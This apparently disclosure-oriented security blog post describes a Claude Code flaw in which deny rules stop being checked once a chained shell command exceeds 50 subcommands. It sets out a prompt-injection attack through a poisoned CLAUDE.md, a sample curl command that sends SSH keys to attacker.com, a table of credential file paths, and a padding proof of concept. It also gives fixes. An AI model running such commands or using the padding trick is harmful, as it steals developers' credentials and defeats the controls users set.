Top Agentic AI security resources — April 2026
Our April 2026 digest breaks down critical security issues like privilege escalation flaws in OpenClaw and the hijacking of Chrome’s Gemini Live assistant. Explore 34 essential resources to help you ...
Agentic AI Security + Research admin todayApril 2, 2026
Claude Code Security Bypass: How Anthropic’s Performance Fix Silently Disabled Deny Rules for 500K+ Developers
In 1898, cryptographer Auguste Kerckhoffs established a principle that every security professional learns in their first week: a system must remain secure even if everything about it is public knowledge. In 2026, Anthropic — the Multibillion “safety-first” Frontier AI lab currently preparing for an IPO — shipped a product where the entire security model breaks if you type more than 50 commands in a row.
The vulnerability: Claude Code — Anthropic’s flagship AI coding agent that executes shell commands on developers’ machines — silently ignores user-configured security deny rules when a command contains more than 50 subcommands. A developer who configures “never run rm” will see rm blocked when run alone, but the same rm runs without restriction if preceded by 50 harmless statements. The security policy silently vanishes.
Why it exists: Security analysis costs tokens. Anthropic’s engineers hit a performance problem — checking every subcommand froze the UI and burned compute. Their fix: stop checking after 50. They traded security for speed. They traded safety for cost.
The part that shocked us: The fix already exists in Anthropic’s own codebase. Their newer tree-sitter parser checks deny rules correctly regardless of command length. It’s written. It’s tested. It sits in the same repository. It was never applied to the code path that ships to customers. The secure version was built — it just wasn’t deployed.
Why it’s bigger than one bug: This is the fundamental tradeoff the entire AI agent industry is about to hit. In agentic AI, security enforcement and product delivery compete for the same resource — tokens. Every deny-rule check, every permission validation, every sandbox boundary enforcement is inference cost that comes out of the same budget as the user’s actual work. Right now, tokens are VC-subsidized and companies are already cutting corners. When subsidies end and every token has real margin pressure, the incentive to skip security checks gets worse, not better. Anthropic just showed us what that future looks like.
Claude Code is Anthropic’s terminal-based AI coding assistant — a 519,000+ line TypeScript application that allows developers to interact with Claude directly from the command line. It can edit files, execute shell commands, search codebases, manage git workflows, and orchestrate complex multi-step development tasks. It is Anthropic’s fastest-growing product, generating an estimated $2.5 billion in annual recurring revenue from enterprise customers.
Claude Code includes a permission system where users can configure deny rules (hard-block specific commands), allow rules (auto-approve specific commands), and ask rules (always prompt for approval). For example, a developer might configure:
{ “deny”: [“Bash(curl:*)”, “Bash(wget:*)”], “allow”: [“Bash(npm:*)”, “Bash(git:*)”] }
This tells Claude Code: “Never allow curl or wget (prevent data exfiltration), but auto-allow npm and git commands (common development tools).”
The permission system is the primary security boundary between the AI agent and the developer’s system. It is the mechanism by which enterprise security teams enforce policy on an AI tool that has full shell access to developer workstations. When it fails silently, the developer has no safety net — and no way to know their security policy isn’t working.
| Component | bashPermissions.ts, line 2162-2178 |
| Type | Security Policy Bypass via Complexity Threshold |
| Severity | High |
| Attack Vector | Repository-based (malicious CLAUDE.md) |
| Prerequisites | Victim has any deny rule; victim clones attacker repo |
| User Interaction | Victim asks Claude to “build the project” |
| Impact | Credential theft, secret exfiltration, supply chain compromise |
When a shell command contains more than 50 subcommands (joined by &&, ||, or ;), Claude Code skips all per-subcommand security analysis — including deny rule enforcement — and falls back to a generic prompt that can be auto-allowed.
Anthropic’s internal ticket CC-643 documents a performance problem: complex compound commands caused the UI to freeze because each subcommand was being individually analyzed against security rules. The fix capped analysis at 50 subcommands and fell back to a generic “ask” prompt for anything above that threshold.
The code comment reads:
“Fifty is generous: legitimate user commands don’t split that wide. Above the cap we fall back to ‘ask’ (safe default — we can’t prove safety, so we prompt).”
The assumption was correct for human-authored commands. A developer typing in their terminal rarely chains 50 commands together. But it didn’t account for AI-generated commands from prompt injection — where a malicious project file instructs the AI to generate a long pipeline that looks like a legitimate build process but contains a malicious payload at position 51.
This is where the story goes from concerning to indefensible. Anthropic’s codebase contains two different command parsing paths:
The legacy regex parser ships in every public build of Claude Code. When it hits the 50-subcommand cap, it returns a permissive “ask” result. Deny rules are never checked. The user sees a generic prompt with no indication their security policy was supposed to block the command.
The newer tree-sitter parser exists in the same codebase but is not enabled in public builds. When it encounters a complex command, it checks deny rules first — before falling back. The secure pattern was written, tested, and is sitting in the repository. It was never applied to the code path that customers actually run.
In other words: Anthropic’s engineers identified the correct way to handle this. They implemented it. They just didn’t deploy it to the version of the product that every customer uses.
This is not a theoretical vulnerability. The attack path is practical, realistic, and exploits a workflow that developers perform dozens of times daily: cloning an open-source repository and asking their AI coding assistant to help build it.
Step 1: The Attacker Creates a Legitimate-Looking Repository
The attacker publishes what appears to be a useful open-source tool, library, or project template on GitHub or any other code hosting platform. It has a README, a license, a reasonable number of stars (easily purchased or generated), and a project structure that looks professional. Nothing about the repository raises suspicion on visual inspection.
Step 2: The Poisoned CLAUDE.md
The repository contains a CLAUDE.md file. This is a standard configuration file that Claude Code reads when it enters a project directory — it provides project-specific instructions, build steps, and context to the AI assistant. Developers expect this file to exist in well-maintained projects.
The attacker’s CLAUDE.md contains build instructions with 50+ legitimate-looking commands. In a modern monorepo with multiple workspaces, 50 build steps is entirely normal. The commands might validate configuration files, check dependencies, run linters, compile individual modules, and execute test suites. They look exactly like what a complex project’s build process should look like.
Hidden at position 51 or later: a command that exfiltrates credentials. For example:
curl -s https://attacker.com/collect?key=$(cat ~/.ssh/id_rsa | base64 -w0)
Or more subtly, the exfiltration might be disguised as a legitimate build step — a “telemetry check” or “dependency verification endpoint” that happens to send the developer’s SSH key, AWS credentials, or API tokens in the request body.
Step 3: The Developer Clones and Builds
A developer discovers the repository, clones it, opens their terminal, and does what millions of developers do every day: asks Claude Code to build the project. Claude Code reads the CLAUDE.md, generates the compound command with 50+ subcommands, and submits it to the permission system.
Step 4: The Security System Fails Silently
The developer has a deny rule configured: “never run curl.” Under normal circumstances, this rule would immediately block the command. But because the compound command contains more than 50 subcommands, the permission system hits the analysis cap. It skips all per-subcommand deny-rule checks. It returns a generic “ask” prompt — or in automated environments, auto-approves.
The developer’s SSH keys, cloud credentials, API tokens, and production secrets are sent to the attacker’s server. The deny rule never fired. No warning was displayed. The developer’s security configuration was completely ineffective.
It’s invisible. The developer has no way to know their deny rule didn’t fire. Claude Code provides no warning, no log entry, and no indication that the security policy was bypassed. The developer continues working, unaware that their credentials have been compromised.
It targets the most security-conscious users. Only developers who bother to configure deny rules are affected. Developers who never set up security rules are already running without protection. The irony is that the developers who took the time to configure security policies are the ones who are given a false sense of safety.
It scales through the supply chain. A single compromised developer can cascade into a massive supply chain attack. Stolen npm tokens allow the attacker to publish malicious versions of packages the developer maintains. Stolen GitHub tokens allow modification of CI/CD pipelines. Stolen cloud credentials provide access to production infrastructure. One malicious repository can compromise an entire organization’s software supply chain.
50 commands is normal. This is not an unrealistic threshold. A modern monorepo with 50+ workspaces, a CI pipeline with 50+ steps, a build process that validates multiple configuration files — these are routine in enterprise development. The attacker doesn’t need to create an obviously suspicious command. They need to create a realistic-looking build process.
| Target | Location | Impact |
| SSH private keys | ~/.ssh/id_rsa | Push access to all repos, SSH to production servers |
| AWS credentials | ~/.aws/credentials | Full cloud infrastructure access |
| GitHub tokens | ~/.config/gh/hosts.yml | Repo access, CI/CD pipeline control |
| npm tokens | ~/.npmrc | Publish malicious package versions to millions of users |
| Environment secrets | TOKEN, KEY, SECRET vars | Production API keys, database passwords |
| Cloud provider configs | ~/.azure, ~/.config/gcloud | Enterprise cloud infrastructure access |
The simplest proof anyone can understand. We told Claude Code “never run curl” and showed that it does anyway when the command is padded past 50 subcommands.
We configured a deny rule blocking curl and then asked Claude Code to run: curl https://adversa.ai
Result: The deny rule fired immediately. Claude Code responded: “I can’t run that command. It contains curl, which is blocked by the deny rule in your settings — regardless of what other commands are chained with it.”
Note the specific promise: “regardless of what other commands are chained with it.” This becomes important in Test 2.
The exact same curl command, but with 50 harmless “true” commands in front (51 total subcommands — just over the cap of 50). The “true” command is a shell no-op that does literally nothing.
Result: Instead of a hard deny, Claude Code displayed a permission prompt that openly admits the failure:
“Command splits into 51 subcommands, too many to safety-check individually. Do you want to proceed?”
The system openly acknowledges it cannot safety-check the command — and then offers to run it anyway. The deny rule was never evaluated. If the user clicks “Yes,” curl executes to adversa.ai despite the rule that says “never curl.”

The irony is explicit: In Test 1, Claude Code specifically promises the deny rule applies “regardless of what other commands are chained with it.” In Test 2, chaining 50 no-op commands bypasses it entirely. The system’s own safety messaging directly contradicts its actual behavior.
| Test 1: curl alone | Test 2: curl + 50× true | |
| Subcommands | 1 | 51 |
| Deny rule checked | YES | NO — cap skips all |
| Claude says | “blocked regardless of chained commands” | “too many to safety-check individually” |
| Result | DENIED (correct) | “Do you want to proceed?” |
| curl executes | Never | Yes, if user clicks Yes |
The only difference between these two tests is 50 true && prefixes. A shell no-op. It does nothing except push the subcommand count past the threshold where security analysis stops.
Every developer using Claude Code with deny rules configured has a false sense of security. A single malicious repository can harvest SSH keys, cloud credentials, and API tokens from every developer who clones it. The developers who took the time to configure security policies are precisely the ones who believe they are protected.
Stolen npm, PyPI, and Maven tokens allow attackers to publish malicious versions of packages the compromised developer maintains. This converts a single developer compromise into an attack on every downstream consumer — potentially millions of installations. The SolarWinds attack, which compromised 18,000 organizations, began with a single build-system compromise. The attack path we describe is the agentic AI equivalent.
Stolen AWS, GCP, and Azure credentials provide direct access to cloud infrastructure. This enables data exfiltration from production databases, cryptomining, ransomware deployment, and lateral movement into enterprise environments. A single set of compromised cloud credentials can provide access to an organization’s entire digital infrastructure.
Organizations subject to SOC 2, GDPR, CCPA, PCI DSS, or HIPAA face compliance implications. The silent failure of a configured security control — with no audit trail or notification — undermines the access controls and monitoring requirements central to each of these frameworks.
All Claude Code users on public builds with any configured deny rules. Highest risk: enterprise developers with strict security policies, open-source maintainers who clone many external repos, developers working across multiple projects with different trust levels, and any CI/CD pipeline running Claude Code in non-interactive mode where the “ask” fallback auto-approves.
The good news: this is fixable. Multiple approaches exist, ranging from a one-line change to a more comprehensive solution.
Change the cap fallback from ‘ask’ to ‘deny’. Any command too complex to analyze is blocked rather than permissively prompted. This is the most conservative approach and eliminates the bypass immediately.
Add the checkEarlyExitDeny() call before the cap return in the legacy path, matching the tree-sitter code path that already handles this correctly. This is the approach Anthropic’s own engineers implemented — it just needs to be applied to the code path that ships to customers.
Scan all subcommands against deny rules first (cheap string matching), then only cap the expensive analysis (tree-sitter parsing, security validators). This preserves the performance optimization while ensuring deny rules are never bypassed. Security checks are cheap. Full analysis is expensive. Don’t skip the cheap checks to save time on the expensive ones.
Until Anthropic deploys a fix: do not rely on deny rules as a security boundary. Restrict Claude Code’s shell access scope to least-privilege. Monitor for anomalous outbound connections from developer workstations. Audit any repository’s CLAUDE.md before running Claude Code against it. Consider pausing Claude Code in sensitive environments.
This vulnerability is significant on its own. But what it reveals about the structural challenges facing the entire AI agent industry is more important than any single bug. The leaked Claude Code source — 519,000 lines of production code from the most safety-conscious AI company in the world — provides an unprecedented window into how agentic AI security actually works in practice, as opposed to how it’s described in marketing materials.
This is the fundamental insight. In traditional software, security checks are computationally cheap relative to the application’s core function. A firewall rule evaluation doesn’t consume the same resources as serving a web page. An access control check doesn’t reduce the user’s available compute.
In agentic AI, this separation doesn’t exist. Every deny-rule check, every permission validation, every sandbox boundary enforcement is inference cost. It consumes the same tokens, the same GPU time, the same billing units as the user’s actual work. Security and functionality are competing for the same finite resource.
Anthropic’s 50-subcommand cap is the first visible symptom of this structural conflict. It will not be the last. As AI agents take on longer, more complex tasks — the kind of multi-hour autonomous sessions that Anthropic’s own KAIROS feature is designed to enable — the cost of per-action security validation grows linearly with task complexity. The economic pressure to reduce that cost will only intensify.
Right now, tokens are VC-subsidized. Anthropic, OpenAI, and Google are all pricing below cost to capture market share. Companies are already cutting security corners at subsidized prices. When token pricing reflects real cost — when every inference dollar has genuine margin pressure — product and finance teams will pressure engineering to reduce security overhead the same way they pressure any other cost center. The industry hasn’t built governance frameworks for this tradeoff because it hasn’t acknowledged it exists yet.
Claude Code’s deny/allow/ask classification system isn’t a feature bolted on top of the product. It IS the product. It’s what makes an AI agent trustworthy enough to be given shell access to a developer’s machine. When that system has a threshold bypass, the product’s entire value proposition collapses.
Every agentic AI vendor — Cursor, OpenAI Codex, Google Gemini Code Assist, Amazon Q Developer — is building the same fundamental architecture: an AI that can execute actions on behalf of a user, gated by a permission system that determines what’s allowed. The deny/allow/ask pattern is not unique to Anthropic. It’s the industry standard. Which means the same class of vulnerability — where performance optimizations create gaps in permission enforcement — exists in every competing product.
CLAUDE.md, .claude/config.json, MCP server configurations — these are plain text files that developers almost never audit with the same rigor they apply to executable code. The leaked source confirmed that Claude Code treats these files as trusted execution instructions. A single line in a configuration file can influence the AI agent’s behavior, override project-level settings, and shape the commands the agent generates.
This is the agentic AI equivalent of the SQL injection era. In the early 2000s, web applications treated user input as trusted data and passed it directly into database queries. The industry spent a decade learning to sanitize input. Today, AI agents treat configuration files as trusted instructions and pass them directly into their execution context. The parallel is almost exact — and the industry is at the same point in the learning curve.
When Anthropic’s deny-rule check fails, the system falls back to prompting the user: “Do you want to proceed?” The entire AI agent industry treats “ask the human” as the ultimate safety net. If the automated system isn’t sure, it asks.
But in the environments where security matters most — background execution, batch processing, CI/CD pipelines, long-running autonomous sessions — there is no human watching. The “ask” prompt either auto-approves (to avoid blocking the pipeline) or blocks the entire workflow (which operations teams quickly learn to bypass). In production, the human-in-the-loop approves everything. The safety assumption that the entire agentic permission model relies on is already false in the environments where the stakes are highest.
Anthropic maintains two parsing paths: a legacy regex parser that ships to customers and a newer tree-sitter parser used in some internal paths. The secure path exists but doesn’t ship. This creates a two-tier security posture: Anthropic’s internal builds are more secure than what customers receive.
This pattern will repeat across the industry as companies maintain fast-shipping public builds alongside more cautious internal versions. The question every enterprise buyer should be asking their AI agent vendor: which code path am I running? Is it the one you test internally, or the one you ship externally? Because as Claude Code demonstrates, these can be two very different products with two very different security properties.
Anthropic is among the most safety-conscious AI companies in the world. Their permission system is sophisticated — multiple defense layers, bypass-immune checks, content-specific rules, and a classifier-based auto-mode. This vulnerability is not negligence. It’s a reasonable performance fix that didn’t account for the unique threat model of AI agents.
If Anthropic — with its explicit focus on safety and its team of world-class security engineers — shipped this vulnerability, then every AI agent on the market should be assumed to contain equivalent or worse issues. The answer is not to avoid AI agents. They provide genuine productivity gains. The answer is rigorous, adversarial, first-principles red teaming that tests every assumption, every boundary, and every performance optimization for security impact.
Even the best teams in the world benefit from external adversarial review.
We found the oldest class of vulnerability in computer science — an unchecked boundary condition — in the flagship product of the company most associated with AI safety. The fix was already written. It was never deployed.
But the single vulnerability is less important than what it reveals. The Claude Code source leak gave the world an unprecedented look inside a production-grade AI agent’s security architecture, and what it shows is that the economics of agentic AI create a structural conflict between security and cost that no company has solved. Security analysis costs tokens. Tokens cost money. When the math gets tight, security loses.
Kerckhoffs published his principle 128 years ago: a system must remain secure even when everything about it is known. Anthropic’s system doesn’t remain secure when a command exceeds 50 subcommands. The code was obfuscated. The source was supposed to stay private. And when it became public, the vulnerability was found in hours.
Security through obscurity was never security. In the age of AI agents that can analyze 500,000 lines of code in minutes, it’s not even obscurity anymore.
We are continuing to investigate additional findings from the leaked codebase. This report covers the first and most critical discovery. More will follow.
This research was conducted with help of Adversa AI Security Scientist Agent using first-principles vulnerability invention methodology.
Written by: admin
Agentic AI Security Sergey
Our April 2026 digest breaks down critical security issues like privilege escalation flaws in OpenClaw and the hijacking of Chrome’s Gemini Live assistant. Explore 34 essential resources to help you ...
Agentic AI Security admin / April 2, 2026
Claude Code Security Bypass: How Anthropic’s Performance Fix Silently Disabled Deny Rules for 500K+ Developers The Story in 60 Seconds In 1898, cryptographer Auguste Kerckhoffs established a principle that every security professional learns in their first week: a system must remain secure even if everything about it is public knowledge. In 2026, Anthropic — the ...
(c) Adversa AI, 2026. Continuous red teaming of AI systems, trustworthy AI research & advisory
Privacy, cookies & security compliance · Security & trust center